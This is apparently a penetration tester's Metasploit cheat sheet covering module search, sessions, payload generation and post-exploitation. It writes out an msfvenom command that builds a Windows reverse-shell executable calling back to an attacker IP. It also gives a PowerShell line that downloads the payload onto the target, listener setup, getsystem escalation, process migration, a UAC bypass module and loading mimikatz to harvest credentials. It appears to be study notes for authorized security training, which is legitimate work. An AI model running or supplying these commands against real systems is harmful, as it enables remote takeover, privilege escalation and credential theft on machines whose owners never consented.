Initial Usage

Selecting a module:

  • show auxiliary - shows auxiliary modules
  • search type:auxiliary smb - searches for auxiliary modules which include smb
  • info - after selecting learn more about the module
  • vulns - after running check to see if there were any discovered
  • creds - check for any creds discovered during the use of msfconsole
  • search Apache 2.4.49 - search for Apache 2.4.49 exploits Dealing with sessions:
  • sessions -l - list sessions
  • sessions -i 2 - initiate session 2 Dealing with channels (meterpreter):
  • ^Z - background channel - y
  • channel -l - list channels
  • channel -i - channel -i 1 Dealing with jobs:
  • run -j
  • jobs - checks for runnign jobs

Local commands:

  • lpwd - local (attacking machine) pwd
  • lcd - local (attacking machine) cd
  • upload /usr/bin/$binary /tmp/ - uploads binary such as linux-privesc-check from Attacking machine to target

Payloads (msfvenom)

  • msfvenom -l payloads –platform windows –arch x64 - lists payloads for windows 64 bit
  • msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.157 LPORT=443 -f exe -o nonstaged.exe - creates a reverse shell tcp payloads on that for attacker (LHOST) with the exe format and the name nonstaged.exe
  • iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe (execute from Target to download shell)
    • use nc -lvnp 443 or multi/handler
  • use multi/handler - exploit in msf
  • set payload windows/x64/shell/reverse_tcp - so either set up in nc or msfconsole’s multi/handler

Post Exploit

  • idletime (meterpreter) - check that user’s idletme
  • shell - switch to shell
    • whoami /priv
  • getuid - check user from meterpreter
  • getsystem - elevate privileges from meterpreter
  • ps
    • then migrate $PID (check to see if other users are running it)
    • execute -H -f notepad
      • -H = hidden, -f = program
  • Check Integrity Level of current process:
    • shell
    • powershell -ep bypass
    • Import-Module NtObjectManager
    • Get-NtTokenIntegrityLevel
      • If that doesnt work then move on, if it does:
        • search UAC - search for UAC bypass modules
        • use exploit/windows/local/bypassuac_sdclt
          • set SESSION $sessionNumber
  • From meterpreter:
    • load kiwi (loads mimikatz)
    • help - shows all commands, including creds_msv